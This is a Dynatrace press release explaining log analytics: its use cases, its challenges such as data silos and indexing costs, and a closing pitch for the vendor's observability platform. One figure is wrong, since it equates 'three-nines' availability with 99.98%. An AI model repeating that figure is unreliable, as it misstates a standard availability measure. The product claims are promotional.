Dynatrace Inc.

07/29/2022 | Press release | Distributed by Public on 07/29/2022 13:03

What is log analytics? How a modern observability approach provides critical business insight

Log analytics is the process of evaluating and interpreting log data so IT teams can quickly detect and resolve application and system issues.

What is log analytics?

Log analytics is the process of viewing, interpreting, and querying log data so developers and IT teams can quickly detect and resolve application and system issues. While an error message or application alert will signal that something has gone wrong, it often requires an investigation to identify what exactly happened, in which part of the system, and how so teams can take action. This is also known as root-cause analysis.

Log analytics is useful for application performance monitoring in cloud, virtualized, and physical environments, including Kubernetes workloads, application security, and business analytics. It's also common for teams, as part of their log monitoring practice, to write business metrics to a log that can then be tracked on a dashboard or trigger an alert.

At the same time, log analytics can present challenges as data volumes explode, particularly in traditional environments that lack end-to-end observability solutions. This is where having the proper log management solution can help teams manage costs, while ensuring they still have visibility into critical application environments.

In what follows, we explore log analytics benefits and challenges, as well as a modern observability approach to log analytics.

What are the use cases for log analytics?

As companies migrate their infrastructure and development workloads to the cloud, there are numerous use cases for log analytics. Consider the following ways teams can apply log analytics to on-premises and multicloud infrastructures:

Application deployment verification. As organizations move and manage their applications in the cloud, they need to be able to monitor the hosts, processes, services, and applications for performance issues in real time. A modern approach to log analytics enables IT teams to find applications that are failing to meet service-level objectives (SLOs).

Fault isolation. If an application fails, log analytics can trace the error back to its source. This enables IT operations teams to identify the precise source of an application error.

Peak performance analysis. Log analytics can determine whether the same service or function is consistently causing an application to not meet SLOs during peak season - for example, when a retailer offers an end-of-season sale, or a financial application is critical for closing out the year. With the right log management and observability platform, IT teams can efficiently identify the root cause of problems during these peak times and maintain three-nines of availability - or 99.98%.

Forensics. The ability to recover and investigate event logs and metadata enables organizations to identify patterns threat actors leave when trying to exploit a vulnerability in your environment. In late 2021, for example, digital forensics was central to combating the Log4Shell vulnerability.

Better-quality code. As development and site reliability engineering (SRE) teams strive to release software faster, log analytics can provide key insight into software quality as part of a broader DevOps observability and automation initiative.

What are the challenges of log analytics?

A lack of end-to-end observability. Observability requires the ability to measure a system's current state based on the data it generates. As environments use thousands of interdependent microservices distributed across multiple clouds and on premises, observability becomes increasingly difficult.

Data silos. As data proliferates in cloud environments, the volume and formats of data grow. IT teams need to be able to access historical and real-time-generated data in an integrated, contextualized fashion so they can perform faster and more precise root-cause analysis. Unfortunately, many organizations have dozens of siloed data collection and monitoring tools and teams.

Indexing overhead. Traditional databases help users and machines find data with a quick search. Databases, however, require indexing - a data structure that improves the speed of data retrieval - before log data can be searched and analyzed. But this is also computationally expensive, causes more data proliferation, takes time, and uses more storage space, all of which increases the cost and overhead of traditional log management systems.

Indexing also requires an educated guess as to which data is needed for future analysis. Data scientists, conversely, prefer to work with the complete unstructured, unindexed data lake using slow, deliberate, and complex techniques.

Cold storage and rehydration. Because data storage can be costly, organizations may opt to store some data in cold, or inactive, storage. Data that organizations may need to access only once a quarter or year can reside in cold storage. Then, teams need to rehydrate it before they can reindex and query that data. Modern log analytics allow teams to access data in real time and get precise answers without indexing it first. This can vastly reduce an organization's storage costs and improve data efficiency.

Inadequate context. Logs are often collected in silos, with limited or no relationship to other data types, then correlated in meaningless ways. Without proper context and causation-based analytics, IT teams often sift through data without knowing whether two alerts are related or how they affect users. A modern observability platform approach can automatically contextualize logs and metrics with traces, topology, and user sessions.

Poor root-cause analysis. IT teams using siloed logging tools struggle to determine root cause. This may be because a log tool can provide only simple correlation. Instead, they need data provided in context that can indicate not only correlation but identify root cause. Lack of causation makes it difficult to reduce mean time to repair (MTTR) and ties up critical staff resources in war rooms trying to identify the problem.

Difficulty understanding business impact. Because digital systems are the engine of every modern organization, log analysis provides critical insight for data-driven business decision-making. Without observability, context, and precision, traditional log monitoring continues to provide many alerts without insight into problems' context and causation. These tools cannot directly reveal how applications, services, or even code changes affect users and business outcomes. The quicker a DevOps team identifies a recent software build that introduced an issue, the sooner they can roll back changes and restore service - manually or with an automated process.

High cost and blind spots. To avoid the high data-ingest costs of traditional log monitoring solutions, many organizations exclude portions of their logs. This results in minimal sampling and analytics capabilities. Although cold storage and rehydration can mitigate high costs, it's inefficient and creates blind spots when teams need visibility most.

An automatic and intelligent approach to log analytics

Modern observability platforms like Dynatrace enable log management and log analytics by strategically and cost-effectively aggregating data from many silos. It can provide the context and querying for developers, IT, and security to quickly identify and understand events' root cause. Having these data insights for decision-making improves collaboration and focuses resources to act quickly to remediate issues. Contextual AI with log analytics enables organizations to derive real-time insights about performance issues, cybersecurity threats, and end-user problems.

Visit our website to learn more about log analytics and log monitoring at Dynatrace.